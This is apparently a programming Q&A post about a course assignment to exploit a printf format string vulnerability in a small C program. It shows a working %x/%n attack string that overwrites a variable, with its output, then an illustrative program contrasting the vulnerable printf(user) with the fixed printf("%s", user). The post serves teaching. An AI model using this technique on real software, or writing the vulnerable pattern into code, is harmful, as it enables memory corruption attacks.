
Exploiting Printf Vulnerability in C

As part of an assignment, I am expected to exploit the printf() vulnerability in the C code shared below. It should work in such a way that when I run the code with a string (e.g. ./format "foo"), I change the "1" in "X equals to 1" to something else. I believe I need to change the value of the x variable, but if you have a different idea, please do not hesitate to share. Here is the code:

#include <stdio.h>
#include <stdlib.h>

int main (int argc, char **argv)
{
    int *p;
    int x = 1;
    p = &x;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }

    /* Prints the address of x and of p; the output below relies on these. */
    printf("x=%d, sizeof(x): %zu, &x = %p, sizeof((p):%zu,&p = %p, \n",
           x, sizeof(x), (void *)&x, sizeof(p), (void *)&p);

    /* The vulnerability: argv[1] is used directly as the format string. */
    printf(argv[1]);

    printf("\nX equals: %d \n", x);
    return 0;
}

You can find pretty decent information (Format string attack) about vulnerabilities in printf when validation is not used properly.

I played with it a little, and running the program like this:

./format "Bob %x %x %x %x %x %x %x %x%n" 

will produce the following output:

x=1, sizeof(x): 4, &x = 0x7fffa9c36e14, sizeof((p):8,&p = 0x7fffa9c36e18,
Bob 81688000 81464ab0 3 81688048 3 a9c36f08 400410 a9c36f00
X equals: 59

If you replace the %n with %x, you will be able to see the address of the variable x. Because %x reads from the process memory and %n writes to the process memory, I was able to change the data inside x (59 is the number of characters printed up to the %n).
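As an added example (not part of the question or the answer above), the following C program isolates the two mechanics the answer relies on so they can be observed deterministically. The function names and the sample input are invented for this illustration. The %n pointer is passed explicitly and the format containing %n is a literal, so the result does not depend on how the stack happens to be laid out behind printf(argv[1]) on a particular machine. The first function shows that %n stores the number of characters printed so far and that a field width lets the attacker choose that number (4 + 55 = 59, the value seen in x above, or any other value). The other two functions contrast the vulnerable printf(user) with the fixed printf("%s", user): the same ten-character input loses a character in the vulnerable version because "%%" is interpreted as a conversion.

```c
#include <stdio.h>

/* Added illustration, not code from the original post. Names are invented. */

/* Mechanics of %n: it stores the number of characters printed so far into
 * the int pointed to by the matching argument. The field width of the %d is
 * what an attacker tunes to choose the value that gets written.
 * Returns the value %n stored (4 + 55 = 59 for prefix "Bob " and width 55).
 * The format is a literal and the pointer is passed explicitly, so the
 * result does not depend on the caller's stack layout. */
int n_write_value(const char *prefix, int width)
{
    int stored = -1;
    printf("%s%*d%n", prefix, width, 1, &stored);
    putchar('\n');
    return stored;
}

/* Vulnerable pattern, the same shape as printf(argv[1]) in the question:
 * user data is the format string, so every '%' in it is interpreted.
 * Returns the number of characters printed. */
int vulnerable_echo(const char *user)
{
    int n = printf(user);   /* -Wformat-security warns here for a reason */
    putchar('\n');
    return n;
}

/* Fixed pattern: user data is an argument, never the format. A '%' in the
 * input is printed literally and nothing is read from or written to the
 * stack. Returns the number of characters printed. */
int safe_echo(const char *user)
{
    int n = printf("%s", user);
    putchar('\n');
    return n;
}

int main(void)
{
    /* Constructed sample input: "100%% sure" is 10 characters of text, but
     * as a format string the "%%" collapses to a single '%'. */
    const char *input = "100%% sure";

    printf("n_write_value: %d\n", n_write_value("Bob ", 55));   /* 59 */
    printf("n_write_value: %d\n", n_write_value("", 200));      /* 200 */
    printf("vulnerable_echo printed %d chars\n", vulnerable_echo(input)); /* 9 */
    printf("safe_echo printed %d chars\n", safe_echo(input));            /* 10 */
    return 0;
}
```

Compile with gcc -Wall -Wformat-security; the warning on vulnerable_echo is exactly the one the question's printf(argv[1]) should trigger, and the fix is the one-line change in safe_echo. In the real program the attacker cannot pass the pointer, which is why the answer spends a run of %x conversions walking the argument area until the %n lands on a slot that happens to hold a usable address.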
